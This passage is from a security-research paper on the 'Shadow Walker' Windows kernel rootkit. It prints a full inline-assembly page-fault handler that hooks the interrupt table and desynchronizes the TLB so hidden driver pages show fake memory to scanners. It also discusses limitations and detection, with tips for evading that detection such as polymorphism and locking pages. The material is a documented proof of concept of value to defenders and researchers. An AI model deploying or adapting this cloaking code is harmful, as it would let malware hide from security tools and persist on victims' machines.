The page is temporarily marked present. 3. For a DTLB load, a memory read on the hooked page is performed. 4. For an ITLB load, a call into the hooked page is performed. 5. The page is marked as non present again. 6. The old physical frame mapping for the PTE is restored. After TLB loading, control is directly returned to the faulting code. /************************************************************************** * NewInt0EHandler - Page fault handler for the memory hook engine (aka. the * guts of this whole thing ;) * * Parameters - none * * Return - none * *************************************************************************** void __declspec( naked ) NewInt0EHandler(void) { __asm { pushad mov edx, dword ptr [esp+0x20] //PageFault.ErrorCode test edx, 0x04 //if the processor was in user mode, then jnz PassDown //pass it down mov eax,cr2 //faulting virtual address cmp eax, HIGHEST_USER_ADDRESS jbe PassDown //we don't hook user pages, pass it down //////////////////////////////////////// //Determine if it's a hooked page ///////////////////////////////////////// push eax call FindPageInHookedList mov ebp, eax //pointer to HOOKED_PAGE structure cmp ebp, ERROR_PAGE_NOT_IN_LIST jz PassDown //it's not a hooked page /////////////////////////////////////// //NOTE: At this point we know it's a //hooked page. We also only hook //kernel mode pages which are either //non paged or locked down in memory //so we assume that all page tables //are resident to resolve the address //from here on out. ///////////////////////////////////// mov eax, cr2 mov esi, PROCESS_PAGE_DIR_BASE mov ebx, eax shr ebx, 22 lea ebx, [esi + ebx*4] //ebx = pPTE for large page test [ebx], 0x80 //check if its a large page jnz IsLargePage mov esi, PROCESS_PAGE_TABLE_BASE mov ebx, eax shr ebx, 12 lea ebx, [esi + ebx*4] //ebx = pPTE IsLargePage: cmp [esp+0x24], eax //Is due to an attepmted execute? jne LoadDTLB //////////////////////////////// // It's due to an execute. Load // up the ITLB. /////////////////////////////// cli or dword ptr [ebx], 0x01 //mark the page present call [ebp].pfnCallIntoHookedPage //load the itlb and dword ptr [ebx], 0xFFFFFFFE //mark page not present sti jmp ReturnWithoutPassdown //////////////////////////////// // It's due to a read /write // Load up the DTLB /////////////////////////////// /////////////////////////////// // Check if the read / write // is originating from code // on the hidden page. /////////////////////////////// LoadDTLB: mov edx, [esp+0x24] //eip cmp edx,[ebp].pDriverStarts jb LoadFakeFrame cmp edx,[ebp].pDriverEnds ja LoadFakeFrame ///////////////////////////////// // If the read /write is originating // from code on the hidden page,then // let it go through. The code on the // hidden page will follow protocol // to clear the TLB after the access. //////////////////////////////// cli or dword ptr [ebx], 0x01 //mark the page present mov eax, dword ptr [eax] //load the DTLB and dword ptr [ebx], 0xFFFFFFFE //mark page not present sti jmp ReturnWithoutPassdown ///////////////////////////////// // We want to fake out this read // write. Our code is not generating // it. ///////////////////////////////// LoadFakeFrame: mov esi, [ebp].pReadWritePte mov ecx, dword ptr [esi] //ecx = PTE of the //read / write page //replace the frame with the fake one mov edi, [ebx] and edi, 0x00000FFF //preserve the lower 12 bits of the //faulting page's PTE and ecx, 0xFFFFF000 //isolate the physical address in //the "fake" page's PTE or ecx, edi mov edx, [ebx] //save the old PTE so we can replace it cli mov [ebx], ecx //replace the faulting page's phys frame //address w/ the fake one //load the DTLB or dword ptr [ebx], 0x01 //mark the page present mov eax, cr2 //faulting virtual address mov eax, dword ptr[eax] //do data access to load DTLB and dword ptr [ebx], 0xFFFFFFFE //re-mark page not present //Finally, restore the original PTE mov [ebx], edx sti ReturnWithoutPassDown: popad add esp,4 iretd PassDown: popad jmp g_OldInt0EHandler }//end asm }//end NewInt0E --[ 4 - Known Limitations & Performance Impact As our current rootkit is intended only as a proof of concept demonstration rather than a fully engineered attack tool, it possesses a number of implementational limitations. Most of this functionality could be added, were one so inclined. First, there is no effort to support hyperthreading or multiple processor systems. Additionally, it does not support the Pentium PAE addressing mode which extends the number of physically addressable bits from 32 to 36. Finally, the design is limited to cloaking only 4K sized kernel mode pages (i.e. in the upper 2 GB range of the memory address space). We mention the 4K page limitation because there are currently some technical issues with regard to hiding the 4MB page upon which ntoskrnl resides. Hiding the page containing ntoskrnl would be a noteworthy extension. In terms of performance, we have not completed rigorous testing, but subjectively speaking there is no noticeable performance impact after the rootkit and memory hooking engine are installed. For maximum performance, as mentioned previously, code and data should remain on separate pages and the usage of global data should be minimized to limit the impact on performance if one desires to enable both data and executable page cloaking. --[ 5 - Detection There are at least a few obvious weaknesses that must be dealt with to avoid detection. Our current proof of concept implementation does not address them, however, we note them here for the sake of completeness. Because we must be able to differentiate between normal page faults and those faults related to the memory hook, we impose the requirement that hooked pages must reside in non paged memory. Clearly, non present pages in non paged memory present an abnormality. Weather or not this is a sufficient heuristic to call a rootkit alarm is, however, debatable. Locking down pagable memory using an API like MmProbeAndLockPages is probably more stealthy. The next weakness lies in the need to disguise the presence of the page fault handler. Because the page where the page fault handler resides cannot be marked non present due to the obvious issues with recursive reentry, it will be vulnerable to a simple signature scan and must be obsfucated using more traditional methods. Since this routine is small, written in ASM, and does not rely upon any kernel API's, polymorphism would be a reasonable solution. A related weakness arises in the need to disguise the presence of the IDT hook. We cannot use our memory hooking technique to disguise the modifications to the interrupt descriptor table for similar reasons as the page fault handler. While we could hook the page fault interrupt via an inline hook rather than direct IDT modification, placing a memory hook on the page containing the OS's INT 0E handler is problematic and inline hooks are easily detected. Joanna Rutkowska proposed using the debug registers to hide IDT hooks [5], but Edgar Barbosa demonstrated they are not a completey effective solution [12]. This is due to the fact that debug registersprotect virtual as opposed to physical addresses. One may simply remap the physical frame containing the IDT to a different virtual address and read / write the IDT memory as one pleases. Shadow Walker falls prey to this type of attack as well, based as it is, upon the exploitation of virtual rather than physical memory. Despite this aknowleged weakness, most commercial security scanners still perform virtual rather than physical memory scans and will be fooled by rootkits like Shadow Walker. Finally, Shadow Walker is insidious. Even if a scanner detects Shadow Walker, it will be virtually helpless to remove it on a running system. Were it to successfully over-write the hook with the original OS page fault handler, for example, it would likely BSOD the system because there would be some page faults occurring on the hidden pages which neither it nor the OS would know how to handle. --[ 6 - Conclusion Shadow Walker is not a weaponized attack tool. Its functionality is limited and it makes no effort to hide it's hook on the IDT or its page fault handler code. It provides only a practical proof of concept implementation of virtual memory subversion. By inverting the defensive software implementation of non executalbe memory, we show that it is possible to subvert the view of virtual memory relied upon by the operating system and almost all security scanner applications. Due to its exploitation of the TLB architecture, Shadow Walker is transparent and exhibits an extremely light weight performance hit. Such characteristics will no doubt make it an attractive solution for viruses, worms, and spyware applications in addition to rootkits. --[ 7 - References 1. Tripwire, Inc. http://www.tripwire.com/ 2. Butler, James, VICE - Catch the hookers! Black Hat, Las Vegas, July, 2004. www.blackhat.com/presentations/bh-usa-04/bh-us-04-butler/ bh-us-04-butler.pdf 3. Fuzen, FU Rootkit. http://www.rootkit.com/project.php?id=12 4. Holy Father, Hacker Defender. http://hxdef.czweb.org/ 5. Rutkowska, Joanna, Detecting Windows Server Compromises with Patchfinder 2. January, 2004. 6. Butler, James and Hoglund, Greg, Rootkits: Subverting the Windows Kernel. July, 2005. 7. B. Cogswell and M. Russinovich, RootkitRevealer, available at: www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml 8. F-Secure BlackLight (Helsinki, Finland: F-Secure Corporation, 2005): www.fsecure.com/blacklight/ 9. Jack, Barnaby. Remote Windows Exploitation: Step into the Ring 0 http://www.eeye.com/~data/publish/whitepapers/research/ OT20050205.FILE.pdf 10. Chong, S.K. Windows Local Kernel Exploitation. http://www.bellua.com/bcs2005/asia05.archive/ BCSASIA2005-T04-SK-Windows_Local_Kernel_Exploitation.ppt 11. William A. Arbaugh, Timothy Fraser, Jesus Molina, and Nick L. Petroni: Copilot: A Coprocessor Based Runtime Integrity Monitor. Usenix Security Symposium 2004. 12. Barbosa, Edgar. Avoiding Windows Rootkit Detection http://packetstormsecurity.org/filedesc/bypassEPA.pdf 13. Rutkowska, Joanna. Concepts For The Stealth Windows Rootkit, Sept 2003 http://www.invisiblethings.org/papers/chameleon_concepts.pdf 14. Russinovich, Mark and Solomon, David. Windows Internals, Fourth Edition. --[ 8 - Aknowlegements Thanks and aknowlegements go to Joanna Rutkowska for her Chamelon Project paper as it was one of the inspirations for this project, to the PAX team for showing how to desynchronize the TLB in their software implementation of non executable memory, to Halvar Flake for our inital discussions of the Shadow Walker idea, and to Kayaker for helping beta test and debug some of the code. We would finally like to extend our greetings to all of the contributors on rootkit.com :) |=[ EOF ]=---------------------------------------------------------------=|